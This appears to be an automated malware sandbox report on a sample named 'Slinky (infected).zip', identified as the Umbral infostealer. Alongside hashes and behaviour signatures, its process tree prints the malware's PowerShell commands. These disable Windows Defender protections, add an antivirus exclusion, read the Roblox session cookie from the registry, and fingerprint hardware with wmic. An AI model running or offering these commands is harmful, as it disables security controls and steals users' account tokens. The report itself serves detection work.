Analysis
-
max time kernel
61s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 09:38
Static task
static1
General
-
Target
Slinky (infected).zip
-
Size
35.0MB
-
MD5
dd023f6d41f8f2f06f959da73f6155de
-
SHA1
64c0cb253073cb4314a6b8491d05e6338d41b6c1
-
SHA256
e8ca7b16e9cf6d75c2cda06a34f001d9da94a2de407758837aa77dc5d79b22f9
-
SHA512
04dbd52a1f19623d14d4d501840690a107b3b8141404cccda5b5477a5bb60ef4e5eea5e6954305b5d34382a38894dc27bfe0b2fa1b90b15ddea9ec1475915380
-
SSDEEP
786432:JFUtju4TxpFDi94Z9dF76v6NhEzGZ1I73hsSACyeCBDC:nYjra9mtDVIrhHvoC
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023ca7-15.dat family_umbral behavioral1/memory/4528-22-0x000002AB973F0000-0x000002AB97430000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2808 powershell.exe 5016 powershell.exe 4200 powershell.exe 3004 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Slinky Injector.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation load.exe -
Executes dropped EXE 3 IoCs
pid Process 2724 load.exe 4528 Slinky Injector.exe 2268 load.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 discord.com 30 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2232 wmic.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2268 load.exe 2268 load.exe 4528 Slinky Injector.exe 2808 powershell.exe 2808 powershell.exe 2268 load.exe 2268 load.exe 5016 powershell.exe 5016 powershell.exe 4200 powershell.exe 4200 powershell.exe 2268 load.exe 2268 load.exe 3756 powershell.exe 3756 powershell.exe 2268 load.exe 2268 load.exe 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe 2268 load.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4176 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4176 7zFM.exe Token: 35 4176 7zFM.exe Token: SeSecurityPrivilege 4176 7zFM.exe Token: SeDebugPrivilege 4528 Slinky Injector.exe Token: SeIncreaseQuotaPrivilege 3500 wmic.exe Token: SeSecurityPrivilege 3500 wmic.exe Token: SeTakeOwnershipPrivilege 3500 wmic.exe Token: SeLoadDriverPrivilege 3500 wmic.exe Token: SeSystemProfilePrivilege 3500 wmic.exe Token: SeSystemtimePrivilege 3500 wmic.exe Token: SeProfSingleProcessPrivilege 3500 wmic.exe Token: SeIncBasePriorityPrivilege 3500 wmic.exe Token: SeCreatePagefilePrivilege 3500 wmic.exe Token: SeBackupPrivilege 3500 wmic.exe Token: SeRestorePrivilege 3500 wmic.exe Token: SeShutdownPrivilege 3500 wmic.exe Token: SeDebugPrivilege 3500 wmic.exe Token: SeSystemEnvironmentPrivilege 3500 wmic.exe Token: SeRemoteShutdownPrivilege 3500 wmic.exe Token: SeUndockPrivilege 3500 wmic.exe Token: SeManageVolumePrivilege 3500 wmic.exe Token: 33 3500 wmic.exe Token: 34 3500 wmic.exe Token: 35 3500 wmic.exe Token: 36 3500 wmic.exe Token: SeIncreaseQuotaPrivilege 3500 wmic.exe Token: SeSecurityPrivilege 3500 wmic.exe Token: SeTakeOwnershipPrivilege 3500 wmic.exe Token: SeLoadDriverPrivilege 3500 wmic.exe Token: SeSystemProfilePrivilege 3500 wmic.exe Token: SeSystemtimePrivilege 3500 wmic.exe Token: SeProfSingleProcessPrivilege 3500 wmic.exe Token: SeIncBasePriorityPrivilege 3500 wmic.exe Token: SeCreatePagefilePrivilege 3500 wmic.exe Token: SeBackupPrivilege 3500 wmic.exe Token: SeRestorePrivilege 3500 wmic.exe Token: SeShutdownPrivilege 3500 wmic.exe Token: SeDebugPrivilege 3500 wmic.exe Token: SeSystemEnvironmentPrivilege 3500 wmic.exe Token: SeRemoteShutdownPrivilege 3500 wmic.exe Token: SeUndockPrivilege 3500 wmic.exe Token: SeManageVolumePrivilege 3500 wmic.exe Token: 33 3500 wmic.exe Token: 34 3500 wmic.exe Token: 35 3500 wmic.exe Token: 36 3500 wmic.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 4200 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeIncreaseQuotaPrivilege 4504 wmic.exe Token: SeSecurityPrivilege 4504 wmic.exe Token: SeTakeOwnershipPrivilege 4504 wmic.exe Token: SeLoadDriverPrivilege 4504 wmic.exe Token: SeSystemProfilePrivilege 4504 wmic.exe Token: SeSystemtimePrivilege 4504 wmic.exe Token: SeProfSingleProcessPrivilege 4504 wmic.exe Token: SeIncBasePriorityPrivilege 4504 wmic.exe Token: SeCreatePagefilePrivilege 4504 wmic.exe Token: SeBackupPrivilege 4504 wmic.exe Token: SeRestorePrivilege 4504 wmic.exe Token: SeShutdownPrivilege 4504 wmic.exe Token: SeDebugPrivilege 4504 wmic.exe Token: SeSystemEnvironmentPrivilege 4504 wmic.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4176 7zFM.exe 4176 7zFM.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2724 wrote to memory of 4528 2724 load.exe 91 PID 2724 wrote to memory of 4528 2724 load.exe 91 PID 2724 wrote to memory of 2268 2724 load.exe 92 PID 2724 wrote to memory of 2268 2724 load.exe 92 PID 4528 wrote to memory of 3500 4528 Slinky Injector.exe 94 PID 4528 wrote to memory of 3500 4528 Slinky Injector.exe 94 PID 4528 wrote to memory of 2808 4528 Slinky Injector.exe 97 PID 4528 wrote to memory of 2808 4528 Slinky Injector.exe 97 PID 4528 wrote to memory of 5016 4528 Slinky Injector.exe 99 PID 4528 wrote to memory of 5016 4528 Slinky Injector.exe 99 PID 4528 wrote to memory of 4200 4528 Slinky Injector.exe 101 PID 4528 wrote to memory of 4200 4528 Slinky Injector.exe 101 PID 4528 wrote to memory of 3756 4528 Slinky Injector.exe 103 PID 4528 wrote to memory of 3756 4528 Slinky Injector.exe 103 PID 4528 wrote to memory of 4504 4528 Slinky Injector.exe 107 PID 4528 wrote to memory of 4504 4528 Slinky Injector.exe 107 PID 4528 wrote to memory of 1432 4528 Slinky Injector.exe 109 PID 4528 wrote to memory of 1432 4528 Slinky Injector.exe 109 PID 4528 wrote to memory of 1700 4528 Slinky Injector.exe 111 PID 4528 wrote to memory of 1700 4528 Slinky Injector.exe 111 PID 4528 wrote to memory of 3004 4528 Slinky Injector.exe 113 PID 4528 wrote to memory of 3004 4528 Slinky Injector.exe 113 PID 4528 wrote to memory of 2232 4528 Slinky Injector.exe 115 PID 4528 wrote to memory of 2232 4528 Slinky Injector.exe 115
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Slinky (infected).zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4176
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3692
-
C:\Users\Admin\Desktop\Slinky\load.exe"C:\Users\Admin\Desktop\Slinky\load.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\Slinky Injector.exe"C:\Users\Admin\AppData\Local\Temp\Slinky Injector.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Slinky Injector.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1432
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3004
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\load.exe"C:\Users\Admin\AppData\Local\Temp\load.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2268
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5ca58d1913d3261f116a299095e04f734
SHA1941d13d0c8c65adb6513f23991acfa0d62facdea
SHA256755daf72f2f5e983abb009c3b1eef4c7c660999f5ff581545bbcae7088c17c69
SHA51287b0d8c9a5348235e9ad6416e09665764db1af408bf763857dc40e39411fa0cf405e3e8b9f0b8540c72aa874059d1dee865aa0cff8dba0fde5779ec9480b5e40
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
948B
MD507d142044fb78e359c794180a9c6fdff
SHA18a7155f93a53ff1b7f382a4ccb3f58ff2f88808e
SHA2562af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea
SHA512356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
228KB
MD522c66a144f89f219d9f7bef81578dd48
SHA1ad7235aadd9583fd423a5f36a5c65a6213d23fff
SHA2569c1f1a7105e258fc4b5df94ba02bd41ddbe55bc82c88cd718fa5b2fac5969f00
SHA51278316d05a92f3c4d9be0f18d1bbc86529961917d83cb00de36a396e96b2357564e354e9cfdc364f08d7e96bdd8602296e6df6eb0d2ea21029c7a45e116edb7a0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
18.4MB
MD538019371c7cfc54d0c08629da0384a1f
SHA187509b8aa5549f22b53362588c624b010cfa5b26
SHA256d4f6bfde46ea2394570619fa89f8cdc8ac00b297179fe8831558530ec48492f1
SHA51275f204fa1be253a68678ec7a6637a8db1b02346fb429365500427e493fd0c2b2d2b24a4ae30de3f777c239af507c141f979b6012c8b394f663d073f2850d682d
-
Filesize
17.6MB
MD5fe9f1266ea6a28f18c8165e625d3f9ce
SHA199ef957f3eb31480257be461ebebc200f5018b94
SHA2566808d24ab0ea5dbafec1ef8bc5b01421aeb1f9817972bc6df415ed935461de61
SHA512fabe0e4d25bb2bd74dcf2ea71dd5163b87a117cd28809bd05ebc8ad08bfcf4682236fb980a6e5affd0c8737acae1b7c0f14ed01bc734c273660c8b0c7038eb82